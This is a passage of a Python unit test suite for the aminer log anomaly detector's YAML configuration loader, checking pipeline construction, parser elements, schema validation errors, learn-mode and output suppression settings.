import LogAtom from time import time from unit.TestBase import TestBase class YamlConfigTest(TestBase): """Unittests for the YamlConfig.""" sysp = sys.path resource_name = b"testresource" def setUp(self): """Add the aminer syspath.""" TestBase.setUp(self) sys.path = sys.path[1:] + ['/usr/lib/logdata-anomaly-miner', '/etc/aminer/conf-enabled'] def tearDown(self): """Reset the syspath.""" TestBase.tearDown(self) sys.path = self.sysp def test1_load_generic_yaml_file(self): """Loads a yaml file into the variable aminer_config.yaml_data.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/template_config.yml') self.assertIsNotNone(aminer_config.yaml_data) def test2_load_nonexistent_yaml_file(self): """Tries to load a nonexistent yaml file. A FileNotFoundError is expected.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) with self.assertRaises(FileNotFoundError): aminer_config.load_yaml('unit/data/configfiles/doesnotexist.yml') def test3_load_invalid_yaml_file(self): """Tries to load a file with invalid yaml syntax. Expects an YAMLError.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) with self.assertRaises(yaml.YAMLError): aminer_config.load_yaml('unit/data/configfiles/invalid_config.yml') def test4_load_yaml_file_with_invalid_schema(self): """Tries to load a yaml-file with an invalid schema. A ValueError is expected.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) with self.assertRaises(ValueError): aminer_config.load_yaml('unit/data/configfiles/invalid_schema.yml') def test5_analysis_pipeline_working_config(self): """This test builds an analysis pipeline from a valid yaml-file.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/multiple_components.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter)) self.assertTrue(isinstance(context.registered_components[1][0], TimestampsUnsortedDetector)) self.assertTrue(isinstance(context.registered_components[2][0], NewMatchPathValueDetector)) self.assertTrue(isinstance(context.registered_components[3][0], NewMatchPathValueComboDetector)) self.assertTrue(isinstance(context.registered_components[4][0], HistogramAnalysis)) self.assertTrue(isinstance(context.registered_components[5][0], PathDependentHistogramAnalysis)) self.assertTrue(isinstance(context.registered_components[6][0], EnhancedNewMatchPathValueComboDetector)) self.assertTrue(isinstance(context.registered_components[7][0], MatchFilter)) self.assertTrue(isinstance(context.registered_components[8][0], MatchValueAverageChangeDetector)) self.assertTrue(isinstance(context.registered_components[9][0], MatchValueStreamWriter)) self.assertTrue(isinstance(context.registered_components[10][0], NewMatchPathDetector)) self.assertTrue(isinstance(context.registered_components[11][0], TimeCorrelationViolationDetector)) self.assertTrue(isinstance(context.registered_components[12][0], AllowlistViolationDetector)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[1], SyslogWriterEventHandler)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[2], DefaultMailNotificationEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/accesslog/time']) self.assertTrue(isinstance(context.atomizer_factory.parsing_model, SequenceModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[1], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[1].element_id, 'sp0') self.assertEqual(context.atomizer_factory.parsing_model.children[1].fixed_data, b' ') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[2], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[3], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[3].element_id, 'sp1') self.assertEqual(context.atomizer_factory.parsing_model.children[3].fixed_data, b' ') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[4], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[5], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[5].element_id, 'sp2') self.assertEqual(context.atomizer_factory.parsing_model.children[5].fixed_data, b' ') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[6], DateTimeModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[7], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[7].element_id, 'sq3') self.assertEqual(context.atomizer_factory.parsing_model.children[7].fixed_data, b' "') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[8], FixedWordlistDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[9], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[9].element_id, 'sp3') self.assertEqual(context.atomizer_factory.parsing_model.children[9].fixed_data, b' ') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[10], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[11], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[11].element_id, 'http1') self.assertEqual(context.atomizer_factory.parsing_model.children[11].fixed_data, b' HTTP/') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[12], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[13], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[13].element_id, 'sq4') self.assertEqual(context.atomizer_factory.parsing_model.children[13].fixed_data, b'" ') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[14], DecimalIntegerValueModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[15], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[15].element_id, 'sp4') self.assertEqual(context.atomizer_factory.parsing_model.children[15].fixed_data, b' ') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[16], DecimalIntegerValueModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[17], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.children[17].element_id, 'sq5') self.assertEqual(context.atomizer_factory.parsing_model.children[17].fixed_data, b' "-" "') self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[18], VariableByteDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[19], FixedDataModelElement)) self.assertEqual(context.atomizer_factory.parsing_model.element_id, 'accesslog') def test6_analysis_fail_without_parser_start(self): """This test checks if the aminer fails without a start-tag for the first parser-model.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) with self.assertRaises(ValueError): aminer_config.load_yaml('unit/data/configfiles/missing_parserstart_config.yml') def test7_analysis_fail_with_double_parser_start(self): """This test checks if the aminer fails without a start-tag for the first parser-model.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) with self.assertRaises(ValueError): aminer_config.load_yaml('unit/data/configfiles/double_parserstart_config.yml') def test8_analysis_fail_with_unknown_parser_start(self): """This test checks if the config-schema-validator raises an error if an unknown parser is configured.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) with self.assertRaises(ValueError): aminer_config.load_yaml('unit/data/configfiles/unknown_parser_config.yml') try: aminer_config.load_yaml('unit/data/configfiles/unknown_parser_config.yml') except ValueError as e: self.assertEqual("{'Parser': [{0: [{'type': [\"field 'type' cannot be coerced: No module named 'UnknownModel'\"]}]}]}", str(e)) def test9_analysis_pipeline_working_config_without_analysis_components(self): """This test checks if the config can be loaded without any analysis components.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/multiple_components_null_analysis_components.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.run_empty_components_tests(context) del aminer_config.yaml_data['Analysis'] context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.run_empty_components_tests(context) def test10_analysis_fail_with_unknown_analysis_component(self): """This test checks if the config-schema-validator raises an error if an unknown analysis component is configured.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) with self.assertRaises(ValueError): aminer_config.load_yaml('unit/data/configfiles/unknown_analysis_component.yml') try: aminer_config.load_yaml('unit/data/configfiles/unknown_analysis_component.yml') except ValueError as e: self.assertEqual("Config-Error: {'Analysis': [{2: ['none or more than one rule validate', {'Analysis error': 'unallowed value" " UnknownDetector'}]}]}", str(e)) def test11_analysis_fail_with_unknown_event_handler(self): """This test checks if the config-schema-validator raises an error if an unknown event handler is configured.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) with self.assertRaises(ValueError): aminer_config.load_yaml('unit/data/configfiles/unknown_event_handler.yml') try: aminer_config.load_yaml('unit/data/configfiles/unknown_event_handler.yml') except ValueError as e: self.assertEqual("{'EventHandlers': [{0: [{'type': [\"field 'type' cannot be coerced: No module named " "'aminer.events.UnknownPrinterEventHandler'\"]}]}]}", str(e)) def test12_analysis_pipeline_working_config_without_event_handler_components(self): """ This test checks if the config can be loaded without any event handler components. This also tests if the StreamPrinterEventHandler was loaded by default. """ spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/multiple_components_null_event_handlers.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.run_empty_components_tests(context) del aminer_config.yaml_data['EventHandlers'] context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.run_empty_components_tests(context) def test13_analysis_pipeline_working_with_json(self): """This test checks if JsonConverterHandler is working properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/json_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter)) self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], JsonConverterHandler)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0].json_event_handlers[0], StreamPrinterEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/accesslog/time']) self.assertTrue(isinstance(context.atomizer_factory.parsing_model, SequenceModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0], VariableByteDataModelElement)) def test14_analysis_pipeline_working_with_learnMode(self): """This test checks if learnMode is working properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/learnMode_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter)) self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector)) self.assertTrue(isinstance(context.registered_components[2][0], NewMatchPathValueDetector)) self.assertTrue(isinstance(context.registered_components[3][0], NewMatchPathValueComboDetector)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/accesslog/time']) self.assertTrue(isinstance(context.atomizer_factory.parsing_model, SequenceModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0], VariableByteDataModelElement)) # specific learn_mode arguments should be preferred. context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertTrue(context.registered_components[1][0].learn_mode) self.assertTrue(context.registered_components[2][0].learn_mode) self.assertFalse(context.registered_components[3][0].learn_mode) # unset specific learn_mode parameters and set LearnMode True. for component in aminer_config.yaml_data['Analysis']: del component['learn_mode'] context = AnalysisContext(aminer_config) context.build_analysis_pipeline() for key in context.registered_components: if hasattr(context.registered_components[key][0], 'learn_mode'): self.assertTrue(context.registered_components[key][0].learn_mode) # unset specific learn_mode parameters and set LearnMode False. aminer_config.yaml_data['LearnMode'] = False context = AnalysisContext(aminer_config) context.build_analysis_pipeline() for key in context.registered_components: if hasattr(context.registered_components[key][0], 'learn_mode'): self.assertFalse(context.registered_components[key][0].learn_mode) # unset LearnMode config property. An Error should be raised. del aminer_config.yaml_data['LearnMode'] context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) def test15_analysis_pipeline_working_with_input_parameters(self): """This test checks if the SimpleMultisourceAtomSync and SimpleByteStreamLineAtomizerFactory are working properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/multiSource_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter)) self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector)) self.assertTrue(isinstance(context.registered_components[2][0], NewMatchPathValueDetector)) self.assertTrue(isinstance(context.registered_components[3][0], NewMatchPathValueComboDetector)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/model/accesslog/time']) self.assertTrue(isinstance(context.atomizer_factory.parsing_model, SequenceModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0], VariableByteDataModelElement)) # test with MultiSource: True. Expects a SimpleByteStreamLineAtomizerFactory with a SimpleMultisourceAtomSync. self.assertTrue(isinstance(context.atomizer_factory, SimpleByteStreamLineAtomizerFactory)) self.assertTrue(isinstance(context.atomizer_factory.atom_handler_list[0], SimpleMultisourceAtomSync)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, [aminer_config.yaml_data['Input']['timestamp_paths']]) # test with MultiSource: False. Expects a SimpleByteStreamLineAtomizerFactory with a AtomFilters.SubhandlerFilter. aminer_config.yaml_data['Input']['multi_source'] = False context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertTrue(isinstance(context.atomizer_factory, SimpleByteStreamLineAtomizerFactory)) self.assertTrue(isinstance(context.atomizer_factory.atom_handler_list[0], SubhandlerFilter)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, [aminer_config.yaml_data['Input']['timestamp_paths']]) def test16_parsermodeltype_parameter_for_another_parsermodel_type(self): """This test checks if all ModelElements with child elements are working properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertTrue(isinstance(context.registered_components[0][0], SubhandlerFilter)) self.assertTrue(isinstance(context.registered_components[1][0], NewMatchPathDetector)) self.assertTrue(isinstance(context.registered_components[2][0], NewMatchPathValueDetector)) self.assertTrue(isinstance(context.registered_components[3][0], NewMatchPathValueComboDetector)) self.assertTrue(isinstance(context.atomizer_factory.event_handler_list[0], StreamPrinterEventHandler)) self.assertEqual(context.atomizer_factory.default_timestamp_path_list, ['/model/accesslog/time']) self.assertTrue(isinstance(context.atomizer_factory.parsing_model, FirstMatchModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0], SequenceModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0].children[0], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[0].children[1], RepeatedElementDataModelElement)) self.assertTrue(isinstance( context.atomizer_factory.parsing_model.children[0].children[1].repeated_element, OptionalMatchModelElement)) self.assertTrue(isinstance( context.atomizer_factory.parsing_model.children[0].children[1].repeated_element.optional_element, FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[1], FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[2], ElementValueBranchModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[2].value_model, FixedDataModelElement)) self.assertTrue(isinstance(context.atomizer_factory.parsing_model.children[2].branch_model_dict['host'], FixedDataModelElement)) # change OptionalModelElement to unknown_model aminer_config.yaml_data['Parser'][1]['args'] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') # change RepeatedElementDataModelElement to unknown_model aminer_config.yaml_data['Parser'][2]['args'][0] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') # change SequenceModelElement to unknown_model aminer_config.yaml_data['Parser'][3]['args'][1] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') # change ElementValueBranchModelElement to unknown_model aminer_config.yaml_data['Parser'][4]['args'][0] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') aminer_config.yaml_data['Parser'][4]['branch_model_dict'][0]['model'] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') # change FirstMatchModelElement to unknown_model aminer_config.yaml_data['Parser'][5]['args'][1] = b'unknown_model' context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) aminer_config.load_yaml('unit/data/configfiles/parser_child_elements_config.yml') def test17_demo_yaml_config_equals_python_config(self): """This test checks if the yaml demo config is the same as the python version.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('demo/aminer/demo-config.yml') yml_context = AnalysisContext(aminer_config) yml_context.build_analysis_pipeline() aminer_config = AminerConfig.load_config('demo/aminer/demo-config.py') py_context = AnalysisContext(aminer_config) py_context.build_analysis_pipeline() import copy yml_config_properties = copy.deepcopy(yml_context.aminer_config.config_properties) del yml_config_properties['Parser'] del yml_config_properties['Input'] del yml_config_properties['Analysis'] del yml_config_properties['EventHandlers'] del yml_config_properties['LearnMode'] del yml_config_properties['LogLineIdentifier'] del yml_config_properties['LogResourceList'][0]['json'] del yml_config_properties['LogResourceList'][0]['xml'] # remove SimpleUnparsedAtomHandler, VerboseUnparsedAtomHandler and NewMatchPathDetector as they are added by the YamlConfig. py_registered_components = copy.copy(py_context.registered_components) del py_registered_components[0] del py_registered_components[1] del py_registered_components[2] del py_registered_components[10] yml_registered_components = copy.copy(yml_context.registered_components) del yml_registered_components[0] del yml_registered_components[1] tmp = {} keys = list(py_registered_components.keys()) for i in range(1, len(py_registered_components)+1): tmp[i] = py_registered_components[keys[i-1]] py_registered_components = tmp py_registered_components_by_name = copy.copy(py_context.registered_components_by_name) del py_registered_components_by_name['SimpleUnparsedHandler'] del py_registered_components_by_name['VerboseUnparsedHandler'] del py_registered_components_by_name['NewMatchPath'] del py_registered_components_by_name['SimpleMonotonicTimestampAdjust'] yml_registered_components_by_name = copy.copy(yml_context.registered_components_by_name) del yml_registered_components_by_name['DefaultNewMatchPathDetector'] del yml_registered_components_by_name['AtomFilter'] self.assertEqual(yml_config_properties, py_context.aminer_config.config_properties) # there actually is no easy way to compare aminer components as they do not implement the __eq__ method. self.assertEqual(len(yml_registered_components), len(py_registered_components)) for i in range(2, len(yml_registered_components)): self.assertEqual(type(yml_registered_components[i]), type(py_registered_components[i])) self.assertEqual(yml_registered_components_by_name.keys(), py_registered_components_by_name.keys()) for name in yml_registered_components_by_name.keys(): self.assertEqual(type(yml_registered_components_by_name[name]), type(py_registered_components_by_name[name])) self.assertEqual(len(yml_context.real_time_triggered_components), len(py_context.real_time_triggered_components)) # the atom_handler_list is not equal as the python version uses a SimpleMonotonicTimestampAdjust. self.assertEqual(yml_context.atomizer_factory.default_timestamp_path_list, py_context.atomizer_factory.default_timestamp_path_list) self.assertEqual(type(yml_context.atomizer_factory.event_handler_list), type(py_context.atomizer_factory.event_handler_list)) def test18_etd_order(self): """Loads the template_config and checks if the position of the ETD was changed as expected.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/template_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertEqual(context.aminer_config.yaml_data['Analysis'][0]['type'].name, 'EventTypeDetector') self.assertEqual(context.aminer_config.yaml_data['Analysis'][1]['type'].name, 'NewMatchPathValueDetector') self.assertEqual(context.aminer_config.yaml_data['Analysis'][2]['type'].name, 'NewMatchPathValueComboDetector') self.assertEqual(context.aminer_config.yaml_data['Analysis'][3]['type'].name, 'NewMatchPathValueComboDetector') def test19_stream_printer_output_file(self): """Check if the output_file_path property of StreamPrinterEventHandler works properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/template_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() self.assertEqual(context.atomizer_factory.event_handler_list[0].stream.name, '/tmp/streamPrinter.txt') self.assertEqual(context.atomizer_factory.event_handler_list[0].stream.mode, 'w+') def test20_suppress_output(self): """ Check if the suppress property and SuppressNewMatchPathDetector are working as expected. This test only includes the StreamPrinterEventHandler. """ __expected_string1 = '%s New path(s) detected\n%s: "%s" (%d lines)\n %s\n\n' t = time() fixed_dme = FixedDataModelElement('s1', b' pid=') match_context_fixed_dme = MatchContext(b' pid=') match_element_fixed_dme = fixed_dme.get_match_element("", match_context_fixed_dme) log_atom_fixed_dme = LogAtom(fixed_dme.fixed_data, ParserMatch(match_element_fixed_dme), t, self) datetime_format_string = '%Y-%m-%d %H:%M:%S' match_path_s1 = "['/s1']" __expected_string2 = '%s New value combination(s) detected\n%s: "%s" (%d lines)\n%s\n\n' fixed_dme2 = FixedDataModelElement('s1', b'25537 uid=') decimal_integer_value_me = DecimalIntegerValueModelElement( 'd1', DecimalIntegerValueModelElement.SIGN_TYPE_NONE, DecimalIntegerValueModelElement.PAD_TYPE_NONE) match_context_sequence_me = MatchContext(b'25537 uid=2') seq = SequenceModelElement('seq', [fixed_dme2, decimal_integer_value_me]) match_element_sequence_me = seq.get_match_element('first', match_context_sequence_me) string2 = " (b'25537 uid=', 2)" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/suppress_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() context.aminer_config.yaml_data['Analysis'][2]['suppress'] = False context.atomizer_factory.event_handler_list[0].stream = self.output_stream default_nmpd = context.registered_components[3][0] default_nmpd.output_logline = False self.assertTrue(default_nmpd.receive_atom(log_atom_fixed_dme)) self.assertEqual(self.output_stream.getvalue(), __expected_string1 % ( datetime.fromtimestamp(t).strftime(datetime_format_string), default_nmpd.__class__.__name__, 'DefaultNewMatchPathDetector', 1, match_path_s1)) self.reset_output_stream() context.aminer_config.yaml_data['Analysis'][2]['suppress'] = True context = AnalysisContext(aminer_config) context.build_analysis_pipeline() context.atomizer_factory.event_handler_list[0].stream = self.output_stream default_nmpd = context.registered_components[3][0] default_nmpd.output_logline = False self.assertTrue(default_nmpd.receive_atom(log_atom_fixed_dme)) self.assertEqual(self.output_stream.getvalue(), "") self.reset_output_stream() value_combo_det = context.registered_components[1][0] log_atom_sequence_me = LogAtom(match_element_sequence_me.get_match_string(), ParserMatch(match_element_sequence_me), t, self) context.atomizer_factory.event_handler_list[0].stream = self.output_stream self.assertTrue(value_combo_det.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), __expected_string2 % ( datetime.fromtimestamp(t).strftime(datetime_format_string), value_combo_det.__class__.__name__, 'ValueComboDetector', 1, string2)) self.reset_output_stream() context.aminer_config.yaml_data['Analysis'][0]['suppress'] = True context = AnalysisContext(aminer_config) context.build_analysis_pipeline() value_combo_det = context.registered_components[1][0] context.atomizer_factory.event_handler_list[0].stream = self.output_stream self.assertTrue(value_combo_det.receive_atom(log_atom_sequence_me)) self.assertEqual(self.output_stream.getvalue(), "") self.reset_output_stream() def test21_suppress_output_no_id_error(self): """Check if an error is raised if no id parameter is defined.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/suppress_config.yml') aminer_config.yaml_data['Analysis'][0]['id'] = None aminer_config.yaml_data['Analysis'][0]['suppress'] = True context = AnalysisContext(aminer_config) self.assertRaises(ValueError, context.build_analysis_pipeline) def test22_set_output_handlers(self): """Check if setting the output_event_handlers is working as expected.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/template_config.yml') context = AnalysisContext(aminer_config) context.build_analysis_pipeline() for index in context.registered_components: component = context.registered_components[index] if component[1] == 'EventTypeDetector': self.assertEqual(1, len(component[0].output_event_handlers)) self.assertEqual(StreamPrinterEventHandler, type(component[0].output_event_handlers[0])) else: self.assertEqual(None, component[0].output_event_handlers) def test23_check_functionality_of_validate_bigger_than_or_equal(self): """Check the functionality of the _validate_bigger_than_or_equal procedure.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) aminer_config.load_yaml('unit/data/configfiles/bigger_than_or_equal_valid.yml') self.assertRaises(ValueError, aminer_config.load_yaml, 'unit/data/configfiles/bigger_than_or_equal_error.yml') def test24_check_log_resource_list(self): """Check the functionality of the regex for LogResourceList..""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) self.assertRaises(ValueError, aminer_config.load_yaml, 'unit/data/configfiles/wrong_log_resource_list.yml') def test25_check_mail_regex(self): """Check the functionality of the regex for MailAlerting.TargetAddress and MailAlerting.FromAddress.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) self.assertRaises(ValueError, aminer_config.load_yaml, 'unit/data/configfiles/wrong_email.yml') with open('/usr/lib/logdata-anomaly-miner/aminer/schemas/BaseSchema.py', 'r') as sma: base_schema = eval(sma.read()) self.assertEqual(base_schema['MailAlerting.TargetAddress']['regex'], base_schema['MailAlerting.FromAddress']['regex']) target_address_regex = re.compile(base_schema['MailAlerting.TargetAddress']['regex']) valid_emails = ['john@example.com', 'john@example.co', 'root@localhost'] for email in valid_emails: self.assertEqual(target_address_regex.search(email).group(0), email, 'Failed regex check at %s.' % email) invalid_emails = ['john_at_example_dot_com', 'john@example.', '@example.com', ' @example.com'] for email in invalid_emails: self.assertEqual(target_address_regex.search(email), None, 'Failed regex check at %s.' % email) def test26_filter_config_errors(self): """Check if errors in multiple sections like Analysis, Parser and EventHandlers are found and filtered properly.""" spec = importlib.util.spec_from_file_location('aminer_config', '/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py') aminer_config = importlib.util.module_from_spec(spec) spec.loader.exec_module(aminer_config) try: aminer_config.load_yaml('unit/data/configfiles/filter_config_errors.yml') except ValueError as e: reg = re.compile( r"Config-Error: \{'AMinerGroup': \['unknown field'], 'Analysis': \[\{0: \['none or more than one rule validate', 